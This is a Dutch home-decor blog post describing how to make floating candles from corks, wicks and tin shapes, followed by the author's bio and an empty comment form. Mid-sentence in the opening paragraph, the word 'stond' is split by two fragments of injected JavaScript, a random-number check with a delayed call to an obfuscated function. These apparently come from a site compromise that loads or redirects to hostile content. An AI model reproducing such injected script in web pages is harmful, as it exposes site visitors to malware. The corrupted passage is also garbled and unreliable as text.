Maak zelf drijfkaarsen van kurk!

Vorig jaar op de VT wonen beurs kwam ik drijfkaarsen tegen van kurken bloemen. Dit sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tond zo decoratief, dat ik dit natuurlijk niet kon laten liggen. Ik moet zeggen dat ik soms wel eens vergeet wat ik ook al weer gekocht heb. Ondanks dat het een tijdje terug was is mij nog heel goed bijgebleven dat ik de tip kreeg om alleen eetbare oliën te gebruiken zoals olijfolie en zonnebloem olie… Waarom? Goede vraag!

Deze kaarsen heb ik kant en klaar gekocht, maar eigenlijk kun je dit ook makkelijk zelf maken. Wijntjes worden er volop gedronken dus altijd wel een kurk in huis.

Wat heb je nodig?

  • Kurken/ of kurkleer uit de hobbywinkel
  • Lonten
  • Metaal/ blik. Dit kun je gesneden kopen in de betere hobbywinkels en diverse webshops. Je kunt naar eigen inzicht zelf figuurtjes knippen met een bliksemschaar.
  • Je kunt een grote vaas of kleine glaasjes vullen met water. Hierboven op kun je een centimeter eetbare olie gieten.

 

Drijfkaars | Kruk Bloem | Viving.nl

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Maak zelf drijfkaarsen van kurk!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.